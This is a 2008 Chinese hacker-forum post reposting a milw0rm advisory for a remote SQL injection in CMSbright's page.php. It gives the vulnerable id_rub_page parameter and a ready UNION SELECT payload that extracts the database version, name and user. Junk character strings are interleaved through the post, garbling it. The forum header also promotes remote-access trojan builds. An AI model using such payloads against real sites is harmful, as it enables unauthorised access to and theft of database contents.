学盟技术交流中心 » 技术文章 » CMSbright (id_rub_page) 远程SQL注入漏洞
学盟技术论坛版主招聘 学生黑客联盟专版灰鸽子 Build 20080117 盟友每日签到处.增加贡献值! 学盟作品发布方式 点此投稿!
新人报道贴 赚取学盟金币! 学生黑客联盟远控黄金版 Build 20080118 学盟开启邀请码.送给你需要的朋友 滨哥和佳佳的blog!
本页主题: CMSbright (id_rub_page) 远程SQL注入漏洞 打印 | 加为IE收藏 | 复制链接 | 收藏主题 | 上一主题 | 下一主题

鎏锦
心若一动,泪行千里。一笑间,云淡风轻。
特殊贡献奖
级别: 总版主


论坛精华: 2
疯狂发帖: 2229
学盟威望: 206 点
学盟金币: 7498 金
学盟贡献: 94 点
学盟好评: 76 分
学盟神石: 0 块
学盟社团: 狼势力社团
在线时间:1907(小时)
签名状态: 未签到-[209次/102天]
注册时间:2007-08-31
最后登录:2008-12-01
引用 推荐 编辑 购买 只看 复制

 CMSbright (id_rub_page) 远程SQL注入漏洞

0
$|-Lw!)D  
文章来自:http://www.milw0rm.com/ XNWtX-[ ^@  
S F*C'  
目标系统来自:  http://www.cmsbright.com/ ]O"f%   
/=m AVA  
利用  : v"o"W[  
hLLSmW (  
public/page.php?id_rub_page=[SQL] pY"WW0p"C  
`s CwgY+  
例子 : aZ4EcQ@-$]  
qgrJi +WZ  
public/page.php?id_rub_page=-9990+union+all+select+concat(version(),database(),user()),2,3,4--
顶端 Posted: 2008-09-02 18:01 | [楼 主]
帖子浏览记录 版块浏览记录
学盟技术交流中心 » 技术文章

Total 0.048450(s) query 5, Time now is:12-02 09:11, Gzip enabled 黑ICP备05002849号
Powered by PHPWind v6.3.2 Certificate Code © 2003-07 PHPWind.com Corporation